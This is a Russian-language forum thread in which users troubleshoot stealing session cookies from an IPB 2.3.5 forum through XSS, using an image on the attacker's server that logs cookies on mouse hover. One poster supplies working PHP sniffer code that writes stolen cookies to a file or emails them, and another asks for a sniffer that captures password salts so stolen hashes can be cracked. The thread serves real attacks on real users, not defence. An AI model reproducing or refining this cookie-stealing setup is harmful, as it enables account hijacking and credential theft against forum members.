Друзья! У меня возникла проблема с кражей cookie. Воруются они с форума на IPB 2.3.5 через XSS. Удаётся при наведении юзером мышкой на картинку заменять одно из изображений форума на такое же точно, только на моём сервере . Вы наверное уже понимаете, что на моём сервере не совсем изображение, а скрипт, который сначала записывает cookie, а потом уже выдаёт картинку. Т.е. выглядит это так: site/images/123.jpg?cookie. Так вот, ситуация такова - куки в браузере есть полностью, а в логах - не достаёт важных параметров member_id (иногда) и pass_hash (почти всегда). Исключение составляют юзеры с Opera 9.23 и 9.27 - у них куки воруются отлично - pass_hash присутствует. Подскажите, пожалуйста, как быть! Возможности JS очень ограничены, форум часто режет или портит скрипт. Спасибо
Нет, member_id иногда присутствует, а вот pass_hash нет никогда. Да и вообще анонимов сниффер из лога сразу отсеивает, дело точно не в этом. Ну так что, даже за деньги никто не поможет?
Такая-же проблема... крадёт только сессию... пробывал на разных браузерах...результат почти один и тотже (иногда и куки сесии нет) . P.S Человек с пятью не, можешь свой снифер скинуть?
Code: <?php $file = true; //сохранять в файл $filename = "cookies.txt"; //имя файла $mail = false; //отправлять на мыло $mailaddr = "[email protected]"; //адрес мыла if ($file) { $f = fopen($filename, 'a'); flock($f,2); fputs($f, $QUERY_STRING."\r\n\r\n\r\n"); fflush ($f); flock($f,3); fclose($f); } if ($mail) { mail ($mailaddr, "Uzer waz XSSed! Eat his cookies! :)", "$QUERY_STRING"); } ?> Должен пахать, пробуй. Хеши точно тырит. Кстати не по теме , но все равно - есть ли такие сниферы которые тянут с хешем salt (соль). Если у кого есть киньте, ибо надо для расшифровки некоторых пассов на 2.1.7.
